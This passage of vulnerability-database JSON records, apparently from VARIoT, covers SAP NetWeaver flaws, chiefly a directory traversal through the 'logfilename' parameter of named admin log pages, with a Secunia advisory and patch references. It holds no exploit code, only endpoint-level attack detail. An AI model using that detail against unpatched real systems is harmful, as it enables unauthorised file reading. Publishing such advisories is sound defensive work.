"data": "Multiple directory traversal vulnerabilities in SAP NetWeaver 7.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the logfilename parameter to (1) b2b/admin/log.jsp or (2) b2b/admin/log_view.jsp in the Internet Sales (crm.b2b) component, or (3) ipc/admin/log.jsp or (4) ipc/admin/log_view.jsp in the Application Administration (com.sap.ipc.webapp.ipc) component. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is a vulnerability in SAP NetWeaver. Because the input passed to the b2b/admin/log_view.jsp or b2b/admin/log.jsp script in the Internet Sales module via the \\\"logfilename\\\" parameter is missing validation before being used to display the file, it can result in arbitrary files being obtained through the directory traversal sequence. information. The SAP NetWeaver com.sap.aii.mdt.amt.web.AMTPageProcessor servlet error can be exploited to leak certain Adapter monitoring information. SAP NetWeaver is prone to multiple input-validation vulnerabilities, including:\n1. A cross-site scripting vulnerability\n2. Multiple information-disclosure vulnerabilities\nAttackers can exploit these issues to execute arbitrary script code in the context of the website, steal cookie-based authentication information, and disclose sensitive information. Other attacks are also possible. ----------------------------------------------------------------------\n\nSecunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March\nListen to our Chief Security Specialist, Research Analyst Director, and Director Product Management \u0026 Quality Assurance discuss the industry\u0027s key topics. Also, visit the Secunia stand #817. Find out more: http://www.rsaconference.com/events/2012/usa/index.htm\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA47861\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/47861/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47861\n\nRELEASE DATE:\n2012-02-21\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/47861/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/47861/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47861\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nDigital Security Research Group has reported some vulnerabilities in\nSAP NetWeaver, which can be exploited by malicious people to conduct\ncross-site scripting attacks and by malicious users and malicious\npeople to disclose sensitive information. \n\nSuccessful exploitation of vulnerabilities #1 and #2 may require\npermission to view logs. \n\nThe vulnerabilities are reported in version 7.0. Other versions may\nalso be affected. \n\nSOLUTION:\nApply SAP Security Notes 1585527 and 1583300. \n\nPROVIDED AND/OR DISCOVERED BY:\nDmitriy Chastukhin, Digital Security Research Group. \n\nORIGINAL ADVISORY:\nDigital Security Research Group:\nhttp://dsecrg.com/pages/vul/show.php?id=412\nhttp://dsecrg.com/pages/vul/show.php?id=413\nhttp://dsecrg.com/pages/vul/show.php?id=414\nhttp://dsecrg.com/pages/vul/show.php?id=415\nhttp://dsecrg.com/pages/vul/show.php?id=416\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1289"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001569"
},
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "IVD",
"id": "57b1159e-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "360fbe54-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "55f9093c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1f68ba5c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "5a3e0c36-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "110028"
}
],
"trust": 5.58
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "52101",
"trust": 4.9
},
{
"db": "SECUNIA",
"id": "47861",
"trust": 4.7
},
{
"db": "NVD",
"id": "CVE-2012-1289",
"trust": 3.7
},
{
"db": "CNNVD",
"id": "CNNVD-201202-431",
"trust": 1.6
},
{
"db": "CNVD",
"id": "CNVD-2012-0825",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2012-0827",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2012-0826",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2012-0822",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2012-0823",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001569",
"trust": 0.8
},
{
"db": "XF",
"id": "73346",
"trust": 0.6
},
{
"db": "IVD",
"id": "57B1159E-1F73-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "360FBE54-1F73-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "55F9093C-1F73-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "1F68BA5C-1F73-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "5A3E0C36-1F73-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "110028",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "57b1159e-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "360fbe54-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "55f9093c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1f68ba5c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "5a3e0c36-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001569"
},
{
"db": "PACKETSTORM",
"id": "110028"
},
{
"db": "NVD",
"id": "CVE-2012-1289"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-431"
}
]
},
"id": "VAR-201202-0345",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "57b1159e-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "360fbe54-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "55f9093c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1f68ba5c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "5a3e0c36-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
}
],
"trust": 3.67111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 3.4
}
],
"sources": [
{
"db": "IVD",
"id": "57b1159e-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "360fbe54-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "55f9093c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1f68ba5c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "5a3e0c36-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
}
]
},
"last_update_date": "2023-12-18T12:10:14.023000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"title": "Patch for SAP NetWeaver Cross-Site Scripting Vulnerability (CNVD-2012-0825)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10773"
},
{
"title": "Patch for SAP NetWeaver File Read Vulnerability (CNVD-2012-0822)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10771"
},
{
"title": "Patch for SAP NetWeaver Information Disclosure Vulnerability (CNVD-2012-0826)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10774"
},
{
"title": "Patch for SAP NetWeaver Information Disclosure Vulnerability (CNVD-2012-0827)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10775"
},
{
"title": "Patch for SAP NetWeaver File Read Vulnerability (CNVD-2012-0823)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10772"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001569"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001569"
},
{
"db": "NVD",
"id": "CVE-2012-1289"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://secunia.com/advisories/47861/"
},
{
"trust": 2.0,
"url": "http://dsecrg.com/pages/vul/show.php?id=413"
},
{
"trust": 2.0,
"url": "http://dsecrg.com/pages/vul/show.php?id=412"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/47861"
},
{
"trust": 1.6,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/52101"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1585527"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/73346"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1289"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1289"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/73346"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=414"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=415"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=416"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://www.rsaconference.com/events/2012/usa/index.htm"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47861"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/47861/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001569"
},
{
"db": "PACKETSTORM",
"id": "110028"
},
{
"db": "NVD",
"id": "CVE-2012-1289"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-431"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "57b1159e-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "360fbe54-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "55f9093c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1f68ba5c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "5a3e0c36-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001569"
},
{
"db": "PACKETSTORM",
"id": "110028"
},
{
"db": "NVD",
"id": "CVE-2012-1289"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-431"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-02-23T00:00:00",
"db": "IVD",
"id": "57b1159e-1f73-11e6-abef-000c29c66e3d"
},
{
"date": "2012-02-23T00:00:00",
"db": "IVD",
"id": "360fbe54-1f73-11e6-abef-000c29c66e3d"
},
{
"date": "2012-02-23T00:00:00",
"db": "IVD",
"id": "55f9093c-1f73-11e6-abef-000c29c66e3d"
},
{
"date": "2012-02-23T00:00:00",
"db": "IVD",
"id": "1f68ba5c-1f73-11e6-abef-000c29c66e3d"
},
{
"date": "2012-02-23T00:00:00",
"db": "IVD",
"id": "5a3e0c36-1f73-11e6-abef-000c29c66e3d"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"date": "2012-02-21T00:00:00",
"db": "BID",
"id": "52101"
},
{
"date": "2012-02-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001569"
},
{
"date": "2012-02-21T06:09:48",
"db": "PACKETSTORM",
"id": "110028"
},
{
"date": "2012-02-23T20:07:25.860000",
"db": "NVD",
"id": "CVE-2012-1289"
},
{
"date": "1900-01-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201202-431"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"date": "2012-02-27T20:40:00",
"db": "BID",
"id": "52101"
},
{
"date": "2012-02-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001569"
},
{
"date": "2017-08-29T01:31:15.990000",
"db": "NVD",
"id": "CVE-2012-1289"
},
{
"date": "2012-02-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201202-431"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201202-431"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Vulnerable to directory traversal",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001569"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Path traversal",
"sources": [
{
"db": "IVD",
"id": "57b1159e-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "360fbe54-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "55f9093c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "1f68ba5c-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "5a3e0c36-1f73-11e6-abef-000c29c66e3d"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-431"
}
],
"trust": 1.6
}
}
var-201708-1668
Vulnerability from variot
SAP NetWeaver is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201708-1668",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "100177"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "100177"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.\nAn attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.",
"sources": [
{
"db": "BID",
"id": "100177"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "100177",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "100177"
}
]
},
"id": "VAR-201708-1668",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:57:41.143000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "www.sap.com/platform/netweaver"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2394536"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/08/08/sap-security-patch-day-august-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "100177"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100177"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-08T00:00:00",
"db": "BID",
"id": "100177"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-08T00:00:00",
"db": "BID",
"id": "100177"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "100177"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver K.M. Web Page Composer URI Redirection Vulnerability",
"sources": [
{
"db": "BID",
"id": "100177"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "100177"
}
],
"trust": 0.3
}
}
var-200909-0698
Vulnerability from variot
SAP NetWeaver is prone to multiple unspecified remote vulnerabilities, including: - Multiple information-disclosure vulnerabilities. - A NULL-pointer dereference vulnerability. - Multiple heap-overflow vulnerabilities. - A denial-of-service vulnerability. Attackers can exploit these issues to execute code within the context of the affected server, cause denial-of-service conditions, and obtain potentially sensitive information.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200909-0698",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "36252"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Intevydis",
"sources": [
{
"db": "BID",
"id": "36252"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
